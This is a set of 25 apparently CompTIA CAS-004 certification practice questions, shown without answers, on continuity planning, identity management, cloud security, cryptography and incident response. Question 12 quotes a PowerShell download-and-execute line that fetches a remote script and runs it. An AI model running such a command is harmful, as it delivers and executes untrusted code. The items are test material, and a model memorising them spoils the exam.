CAS-004

By CompTIA
Aug, 2025


Question 1

An organization is referencing NIST best practices for BCP creation while reviewing current internal organizational processes for mission-essential items.
Which of the following phases establishes the identification and prioritization of critical systems and functions?

  • A: Review a recent gap analysis.
  • B: Perform a cost-benefit analysis.
  • C: Conduct a business impact analysis.
  • D: Develop an exposure factor matrix.

Question 2

An organization is implementing a new identity and access management architecture with the following objectives:
✑ Supporting MFA against on-premises infrastructure
✑ Improving the user experience by integrating with SaaS applications
✑ Applying risk-based policies based on location
✑ Performing just-in-time provisioning
Which of the following authentication protocols should the organization implement to support these requirements?

  • A: Kerberos and TACACS
  • B: SAML and RADIUS
  • C: OAuth and OpenID
  • D: OTP and 802.1X

Question 3

A security analyst observes the following while looking through network traffic in a company's cloud log:

Image 1

Which of the following steps should the security analyst take FIRST?

  • A: Quarantine 10.0.5.52 and run a malware scan against the host.
  • B: Access 10.0.5.52 via EDR and identify processes that have network connections.
  • C: Isolate 10.0.50.6 via security groups.
  • D: Investigate web logs on 10.0.50.6 to determine if this is normal traffic.

Question 4

Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint?

  • A: Isolation control failure
  • B: Management plane breach
  • C: Insecure data deletion
  • D: Resource exhaustion

Question 5

An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice.
Which of the following should the organization consider FIRST to address this requirement?

  • A: Implement a change management plan to ensure systems are using the appropriate versions.
  • B: Hire additional on-call staff to be deployed if an event occurs.
  • C: Design an appropriate warm site for business continuity.
  • D: Identify critical business processes and determine associated software and hardware requirements.

Question 6

Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:

  • A: when it is passed across a local network.
  • B: in memory during processing.
  • C: when it is written to a system's solid-state drive.
  • D: by an enterprise hardware security module.

Question 7

A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
✑ Support all phases of the SDLC.
✑ Use tailored website portal software.
✑ Allow the company to build and use its own gateway software.
✑ Utilize its own data management platform.
✑ Continue using agent-based security tools.
Which of the following cloud-computing models should the CIO implement?

  • A: SaaS
  • B: PaaS
  • C: MaaS
  • D: IaaS

Question 8

A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?

  • A: Worm
  • B: Logic bomb
  • C: Fileless
  • D: Rootkit

Question 9

A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.)

  • A: Bot protection
  • B: OAuth 2.0
  • C: Input validation
  • D: Autoscaling endpoints
  • E: Rate limiting
  • F: CSRF protection

Question 10

An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?

  • A: Adding a second redundant layer of alternate vendor VPN concentrators
  • B: Using Base64 encoding within the existing site-to-site VPN connections
  • C: Distributing security resources across VPN sites
  • D: Implementing IDS services with each VPN concentrator
  • E: Transitioning to a container-based architecture for site-based services

Question 11

A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?

  • A: Encryption in transit
  • B: Legal issues
  • C: Chain of custody
  • D: Order of volatility
  • E: Key exchange

Question 12

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois
Which of the following security controls would have alerted and prevented the next phase of the attack?

  • A: Antivirus and UEBA
  • B: Reverse proxy and sandbox
  • C: EDR and application approved list
  • D: Forward proxy and MFA

Question 13

Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?

  • A: Lattice-based cryptography
  • B: Quantum computing
  • C: Asymmetric cryptography
  • D: Homomorphic encryption

Question 14

As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?

  • A: Risk rejection
  • B: Risk mitigation
  • C: Risk transference
  • D: Risk avoidance

Question 15

A DevOps team has deployed databases, event-driven services, and an API gateway as a PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?

  • A: Securely configure the authentication mechanisms.
  • B: Patch the infrastructure at the operating system.
  • C: Execute port scanning against the services.
  • D: Upgrade the service as part of life-cycle management.

Question 16

A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information?

  • A: HIPS
  • B: UEBA
  • C: HIDS
  • D: NIDS

Question 17

The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?

  • A: Software composition analysis
  • B: Code obfuscation
  • C: Static analysis
  • D: Dynamic analysis

Question 18

A forensic investigator would use the foremost command for:

  • A: cloning disks.
  • B: analyzing network-captured packets.
  • C: recovering lost files.
  • D: extracting features such as email addresses.

Question 19

A software company is developing an application in which data must be encrypted with a cipher that requires the following:
✑ Initialization vector
✑ Low latency
✑ Suitable for streaming
Which of the following ciphers should the company use?

  • A: Cipher feedback
  • B: Cipher block chaining message authentication code
  • C: Cipher block chaining
  • D: Electronic codebook

Question 20

An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational.
Which of the following BEST describes the reason why the silent failure occurred?

  • A: The system logs rotated prematurely.
  • B: The disk utilization alarms are higher than what the service restarts require.
  • C: The number of nodes in the self-healing cluster was healthy.
  • D: Conditional checks prior to the service restart succeeded.

Question 21

A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.
Which of the following technologies would BEST meet this need?

  • A: Faraday cage
  • B: WPA2 PSK
  • C: WPA3 SAE
  • D: WEP 128 bit

Question 22

An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.
Which of the following side-channel attacks did the team use?

  • A: Differential power analysis
  • B: Differential fault analysis
  • C: Differential temperature analysis
  • D: Differential timing analysis

Question 23

A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

  • A: NAC to control authorized endpoints
  • B: FIM on the servers storing the data
  • C: A jump box in the screened subnet
  • D: A general VPN solution to the primary network

Question 24

A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company's services to ensure false positives do not drop legitimate traffic.
Which of the following would satisfy the requirement?

  • A: NIDS
  • B: NIPS
  • C: WAF
  • D: Reverse proxy

Question 25

A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN.
Which of the following solutions does this describe?

  • A: Full tunneling
  • B: Asymmetric routing
  • C: SSH tunneling
  • D: Split tunneling